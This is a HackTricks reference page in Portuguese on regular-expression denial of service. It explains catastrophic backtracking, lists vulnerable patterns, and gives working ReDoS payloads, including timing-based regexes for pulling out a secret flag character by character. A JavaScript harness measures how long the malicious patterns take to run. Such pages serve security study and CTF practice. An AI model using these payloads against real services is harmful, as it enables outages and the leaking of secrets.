6.6 KiB
Denial of Service de Expressão Regular - ReDoS
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
Denial of Service de Expressão Regular (ReDoS)
Um Denial of Service de Expressão Regular (ReDoS) acontece quando alguém se aproveita de vulnerabilidades na forma como as expressões regulares (uma maneira de pesquisar e combinar padrões em texto) funcionam. Às vezes, quando as expressões regulares são usadas, elas podem se tornar muito lentas, especialmente se o pedaço de texto com o qual estão trabalhando fica maior. Essa lentidão pode se tornar tão ruim que cresce muito rapidamente mesmo com pequenos aumentos no tamanho do texto. Os atacantes podem usar esse problema para fazer um programa que usa expressões regulares parar de funcionar corretamente por um longo período de tempo.
O Algoritmo Naïve de Regex Problemático
Verifique os detalhes em https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
Regexes Maliciosas
Um padrão de expressão regular malicioso é aquele que pode ficar preso em uma entrada manipulada causando um DoS. Os padrões de regex maliciosos geralmente contêm agrupamento com repetição e repetição ou alternância com sobreposição dentro do grupo repetido. Alguns exemplos de padrões maliciosos incluem:
- (a+)+
- ([a-zA-Z]+)*
- (a|aa)+
- (a|a?)+
- (.*a){x} para x > 10
Todos esses são vulneráveis à entrada aaaaaaaaaaaaaaaaaaaaaaaa!
.
Payloads ReDoS
Exfiltração de String via ReDoS
Em um CTF (ou recompensa por bugs) talvez você controle o Regex com o qual uma informação sensível (a flag) é correspondida. Então, pode ser útil fazer a página congelar (tempo limite ou tempo de processamento mais longo) se o Regex corresponder e não se não corresponder. Dessa forma, você poderá exfiltrar a string caractere por caractere:
- Neste post você pode encontrar esta regra ReDoS:
^(?=<flag>)((.*)*)*salt$
- Exemplo:
^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
- Neste writeup você pode encontrar este:
<flag>(((((((.*)*)*)*)*)*)*)!
- Neste writeup ele usou:
^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$
ReDoS Controlando Entrada e Regex
Os seguintes são exemplos de ReDoS onde você controla tanto a entrada quanto o regex:
function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}
// This payloads work because the input has several "a"s
[
// "((a+)+)+$", //Eternal,
// "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))
/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/
Ferramentas
Referências
- https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
- https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets
- https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html
- https://ctftime.org/writeup/25869
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.